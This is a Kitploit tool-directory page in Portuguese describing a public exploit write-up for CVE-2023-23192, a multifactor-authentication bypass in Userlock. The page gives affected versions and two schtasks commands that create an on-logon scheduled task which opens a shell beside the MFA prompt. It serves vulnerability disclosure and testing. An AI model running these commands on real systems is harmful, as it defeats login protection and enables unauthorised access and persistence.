Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-23192 — CVE-2023-23192 | Kitploit
Ferramentas/GitHubGitHub/pinarsadioglu/cve-2023-23192
Privilege EscalationPersistence MechanismsVulnerability AnalysisExploitationPenetration TestingAuthentication
GitHubpinarsadioglu/cve-2023-23192

CVE-2023-23192

CVE-2023-23192

Ver Repositório
133há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-23192

CVE-2023-23192- Userlock - Bypass de Autenticação Multifator (MFA)

Título do Exploit: Userlock - Bypass de Autenticação Multifator (MFA)

Data: 01/11/2023

Autor do Exploit: Pinar Sadioglu

Homepage do Fornecedor: https://www.isdecisions.com/products/userlock/help/#

Versão: < = 11.0.1.40

Testado em: Windows 10

Software: Testado com o 'Desktop agent' do Userlock para proteger sessões interativas em estações de trabalho ou servidores de terminal.

CVE: CVE-2023-23192

MITRE ATT&CK: T1053.005 - Tarefa Agendada/Job: Tarefa Agendada

Permissões Necessárias: Administrador, Root

https://nvd.nist.gov/vuln/detail/CVE-2023-23192

Descrição: Userlock é uma solução de Autenticação Multifator para ambientes Windows Active Directory & Cloud para impedir acesso não autorizado e indesejado. Ele permite autenticação personalizada de dois fatores (2FA) no logon do Windows, Área de Trabalho Remota (RDP & RD Gateway), IIS, VPN e Aplicações Cloud. O Userlock permite implementar MFA nos logons do Active Directory em estações de trabalho e servidores associados ao domínio. Uma caixa de diálogo é exibida onde você pode inserir o código OTP do aplicativo Autenticador no primeiro logon do dia em sua estação de trabalho. O Userlock integra-se ao processo de logon para fornecer autenticação de dois fatores.

Uma das estratégias mais comumente exploradas por atores de ameaças para estabelecer persistência no computador de uma vítima é o agendamento de tarefas. O adversário frequentemente usa essa estratégia para evitar detecção automatizada, manter persistência e realizar ataques surpresa após longos períodos de inatividade.

Vulnerabilidade:

Crie uma tarefa agendada que seja executada após o logon de qualquer usuário.

root@kitploit:~
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c powershell.exe"

mfa

Após efetuar logon com sucesso usando as credenciais de domínio, o cmd.exe agendado é exibido junto com a caixa de diálogo MFA do Userlock.

root@kitploit:~
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c explorer.exe"
Baixar ferramenta